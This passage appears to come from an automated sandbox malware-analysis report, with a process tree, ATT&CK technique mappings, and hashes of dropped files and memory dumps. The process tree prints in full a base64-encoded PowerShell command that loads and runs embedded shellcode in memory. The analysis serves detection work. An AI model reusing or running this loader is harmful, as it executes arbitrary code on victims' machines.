    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABYAFoASQBxACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWABaAEkAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgANQBhACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADAANgAsADAAeAA0ADkALAAwAHgANAA3ACwAMAB4AGUAZAAsADAAeAA0AGEALAAwAHgAOAA1ACwAMAB4ADAAOAAsADAAeAAwAGUALAAwAHgAYgAyACwAMAB4ADUANgAsADAAeAA3ADcALAAwAHgAOAA2ACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAYQA1ACwAMAB4AGYAYwAsADAAeAAxAGMALAAwAHgAZABhACwAMAB4ADcAOQAsADAAeAA3ADYALAAwAHgANwAwACwAMAB4AGQANwAsADAAeABmADIALAAwAHgAZABhACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAZgBiACwAMAB4ADUAMAAsADAAeABmAGEALAAwAHgAMwAwACwAMAB4ADAAYgAsADAAeABkADAALAAwAHgAYgAwACwAMAB4ADYANgAsADAAeAAyADIALAAwAHgAZABlACwAMAB4AGUAOAAsADAAeAA1AGIALAAwAHgAMgA1ACwAMAB4AGEAMgAsADAAeABmADIALAAwAHgAOABmACwAMAB4ADgANQAsADAAeAA5AGIALAAwAHgAMwBkACwAMAB4AGMAMgAsADAAeABjADQALAAwAHgAZABjACwAMAB4ADgAOAAsADAAeABhADgALAAwAHgAMgA5ACwAMAB4AGIAMAAsADAAeAA1AGQALAAwAHgAZAA4ACwAMAB4AGUANAAsADAAeAAyADUALAAwAHgAZQBhACwAMAB4ADkAYwAsADAAeAAzADQALAAwAHgANAA3ACwAMAB4ADMAYwAsADAAeABhAGIALAAwAHgAMAA1ACwAMAB4ADMAZgAsADAAeAAzADkALAAwAHgANgBjACwAMAB4AGYAMQAsADAAeABmADMALAAwAHgANAAwACwAMAB4AGIAZAAsADAAeABhAGEALAAwAHgAOAAwACwAMAB4ADEAYQAsADAAeAAxAGQALAAwAHgANABhACwAMAB4ADQANAAsADAAeAAxADEALAAwAHgAMQA1ACwAMAB4ADUANAAsADAAeABlAGYALAAwAHgAZQBjACwAMAB4AGQAMgAsADAAeAA1ADgALAAwAHgAYQA2ACwAMAB4ADYANQAsADAAeAAyAGUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeAA4ADYALAAwAHgANABlACwAMAB4AGYAYQAsADAAeAA1AGIALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeABjAGQALAAwAHgAOQAxACwAMAB4ADkANAAsADAAeAAxADIALAAwAHgAMQA1ACwAMAB4ADkAMQAsADAAeAAwADQALAAwAHgANgAxACwAMAB4ADYAZAAsADAAeABlADEALAAwAHgAYgA5ACwAMAB4ADcAMgAsADAAeABiADYALAAwAHgAOQBiACwAMAB4ADYANQAsADAAeABmADYALAAwAHgAMgA5ACwAMAB4ADMAYgAsADAAeABlAGUALAAwAHgAYQAwACwAMAB4ADgAZAAsADAAeABiAGQALAAwAHgAMgAzACwAMAB4ADMANgAsADAAeAA0ADUALAAwAHgAYgAxACwAMAB4ADgAOAAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAOQAwACwAMAB4ADMAOQAsADAAeABlADIALAAwAHgAOAA0ACwAMAB4ADEANwAsADAAeABlAGUALAAwAHgANgAyACwAMAB4AGQAZQAsADAAeAAzADMALAAwAHgAMgBhACwAMAB4ADIAZQAsADAAeAA4ADUALAAwAHgANQBhACwAMAB4ADYAYgAsADAAeAA4AGEALAAwAHgANgA4ACwAMAB4ADYAMgAsADAAeAA2AGIALAAwAHgANwAyACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA3ACwAMAB4ADkAMQAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4ADAAOAAsADAAeAA2AGEALAAwAHgAMgBkACwAMAB4ADIAYQAsADAAeAA5AGYALAAwAHgAYQA2ACwAMAB4AGUAMwAsADAAeABkADUALAAwAHgANQBmACwAMAB4AGEAMQAsADAAeAA3ADQALAAwAHgAYQA1ACwAMAB4ADYAZAAsADAAeAA2AGUALAAwAHgAMgBlACwAMAB4ADIAMQAsADAAeABkAGUALAAwAHgAZQA3ACwAMAB4AGUAOAAsADAAeABiADYALAAwAHgANQA3ACwAMAB4AGUAZgAsADAAeAAwAGIALAAwAHgANgA4ACwAMAB4AGQAZgAsADAAeAA2ADAALAAwAHgAZgAyACwAMAB4ADgAOQAsADAAeAAyADAALAAwAHgAYQA4ACwAMAB4ADMAMAAsADAAeABkAGQALAAwAHgANwAwACwAMAB4AGMAMgAsADAAeAA5ADEALAAwAHgANQBlACwAMAB4ADEAYgAsADAAeAAxADIALAAwAHgAMQBlACwAMAB4ADgAYgAsADAAeABiADYALAAwAHgAMQA4ACwAMAB4ADgAOAAsADAAeABmADQALAAwAHgAZQBmACwAMAB4ADMANwAsADAAeABjAGEALAAwAHgAOQBkACwAMAB4AGUAZAAsADAAeAA0ADcALAAwAHgAZABiACwAMAB4ADAAMQAsADAAeAA3AGIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADkALAAwAHgAMgBiACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANQBhACwAMAB4ADgAYwAsADAAeAAyAGUALAAwAHgAMAAzACwAMAB4AGIAMAAsADAAeAAwADMALAAwAHgAMQAwACwAMAB4ADMAMwAsADAAeABiAGIALAAwAHgAYwA5ACwAMAB4ADMAOQAsADAAeABkADkALAAwAHgANQA0ACwAMAB4AGEANAAsADAAeAAxADIALAAwAHgANwA1ACwAMAB4AGMAYwAsADAAeABlAGQALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAxADEALAAwAHgAMwA4ACwAMAB4ADkANAAsADAAeAAyADYALAAwAHgAOQA5ACwAMAB4AGMAZgAsADAAeAA2ADgALAAwAHgAZQA4ACwAMAB4ADYAYQAsADAAeABhADUALAAwAHgANwBhACwAMAB4ADkAYwAsADAAeAA5AGEALAAwAHgAZgAwACwAMAB4ADIAMQAsADAAeAAwAGEALAAwAHgAYQA0ACwAMAB4ADIAZQAsADAAeAA0AGYALAAwAHgAYgAyACwAMAB4ADMAMAAsADAAeABkADUALAAwAHgAYwA2ACwAMAB4AGUANQAsADAAeABhAGMALAAwAHgAZAA3ACwAMAB4ADMAZgAsADAAeABjADEALAAwAHgANwAyACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANQBhACwAMAB4AGIAYQAsADAAeABiAGQALAAwAHgAZAA1ACwAMAB4ADMANAAsADAAeABjADMALAAwAHgANQAxACwAMAB4AGQANgAsADAAeABjADQALAAwAHgAOQA1ACwAMAB4ADMAYgAsADAAeABkADYALAAwAHgAYQBjACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAOAA1ACwAMAB4AGMAOQAsADAAeAA4AGQALAAwAHgAYgA1ACwAMAB4AGIAOQAsADAAeAA0ADIALAAwAHgAMQA4ACwAMAB4ADMANgAsADAAeABlADgALAAwAHgAMwA3ACwAMAB4ADgAYgAsADAAeAA1AGUALAAwAHgAMQA2ACwAMAB4ADYAZQAsADAAeABmAGIALAAwAHgAYwAwACwAMAB4AGUAOQAsADAAeAA0ADUALAAwAHgAZgBkACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAYQAzACwAMAB4ADgAYgAsADAAeAAyAGYALAAwAHgAZgBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABDAGkAagBGAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABDAGkAagBGAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAGkAagBGACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4808
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ia2ybept\ia2ybept.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2292
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADE3.tmp" "c:\Users\Admin\AppData\Local\Temp\ia2ybept\CSC18206FBA61124A82A5717EBA786AAFD.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESADE3.tmp

Filesize
1KB

MD5
eccaca441f97071d66c0ed02ce459806

SHA1
5ad64585bfef555067507fe69c54ca0ff423a0c7

SHA256
bef29027273aa0b9e399b7deeba120313ab357b72be251ce4ec57184b08f818a

SHA512
19fd44229a20cdbc58e9fef44b8cd931040d60057900a7b470a7b92587d83083902d41184a860acf6342b0c37fd85778ec4ed5ded78185bfbbbe2e073e4c4f70

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ol4h21jh.iii.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ia2ybept\ia2ybept.dll

Filesize
3KB

MD5
fb1441e17ecdfd8decf45c488cf16e05

SHA1
b9cd50880283932b3401a2cd6eb47055c082d17d

SHA256
00732029a17979dd113891d5daeb2f81918e1672df661e799f98982a0bb632c0

SHA512
491c675e311084b06dfe67fcac15c25eeec0b753c55d01cdebc55d528e556bdef5d2128a7deecd1fdbaedf7f89d009f8ca163716d4eda28b4d6a39de4ee91a74

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ia2ybept\CSC18206FBA61124A82A5717EBA786AAFD.TMP

Filesize
652B

MD5
6ad43ded62745a89a7de435742922fca

SHA1
6760e2c532ee3703132e15b4a543764e020b82dc

SHA256
8a25bca5fed32397094e34cd14c1bc57bf123372e12e8a3e4a8a43b07e393dea

SHA512
975a71a815ecacf9be121eeb85d6f9eba70cc913d0853211d5cff4ee6f210600fc11fe8796c7b31482cdb1361e508a3802f75bb2a3a7f5a4c69f03be5664abed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ia2ybept\ia2ybept.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ia2ybept\ia2ybept.cmdline

Filesize
369B

MD5
be64e323dd7a2def1d7af25bfde0881b

SHA1
05f43487d7a2697fb69486c0fc20e6ac8e91b119

SHA256
b8463d00211fa24582675c476e8c42acb03de1c56c926a7ecb36d8cc9a22b008

SHA512
c06a0f5ea180b00dd0bf4b4b955a8774e89d719b903aef8b7c91704e433f0876803995cbb1664b07cfce0c035475970764c906c0cc777985ad8610fd99125c87

Download Submit
memory/448-14-0x00007FF974D60000-0x00007FF975821000-memory.dmp

Filesize
10.8MB

Download
memory/448-53-0x00007FF974D60000-0x00007FF975821000-memory.dmp

Filesize
10.8MB

Download
memory/448-13-0x00007FF974D60000-0x00007FF975821000-memory.dmp

Filesize
10.8MB

Download
memory/448-12-0x00007FF974D60000-0x00007FF975821000-memory.dmp

Filesize
10.8MB

Download
memory/448-7-0x000001ABA6840000-0x000001ABA6862000-memory.dmp

Filesize
136KB

Download
memory/3436-0-0x00007FF974D63000-0x00007FF974D65000-memory.dmp

Filesize
8KB

Download
memory/3436-52-0x00007FF974D63000-0x00007FF974D65000-memory.dmp

Filesize
8KB

Download
memory/3436-1-0x00000000005C0000-0x00000000005CA000-memory.dmp

Filesize
40KB

Download
memory/4808-15-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/4808-30-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/4808-33-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

Filesize
120KB

Download
memory/4808-34-0x0000000005B30000-0x0000000005B7C000-memory.dmp

Filesize
304KB

Download
memory/4808-35-0x0000000007140000-0x00000000077BA000-memory.dmp

Filesize
6.5MB

Download
memory/4808-36-0x0000000006050000-0x000000000606A000-memory.dmp

Filesize
104KB

Download
memory/4808-31-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/4808-28-0x0000000004EB0000-0x0000000004ED2000-memory.dmp

Filesize
136KB

Download
memory/4808-29-0x00000000055B0000-0x0000000005616000-memory.dmp

Filesize
408KB

Download
memory/4808-32-0x0000000005690000-0x00000000059E4000-memory.dmp

Filesize
3.3MB

Download
memory/4808-18-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download
memory/4808-49-0x00000000060D0000-0x00000000060D8000-memory.dmp

Filesize
32KB

Download
memory/4808-51-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

Filesize
4KB

Download
memory/4808-17-0x0000000004F50000-0x0000000005578000-memory.dmp

Filesize
6.2MB

Download
memory/4808-16-0x0000000000D90000-0x0000000000DC6000-memory.dmp

Filesize
216KB

Download
memory/4808-54-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/4808-55-0x0000000074D50000-0x0000000075500000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads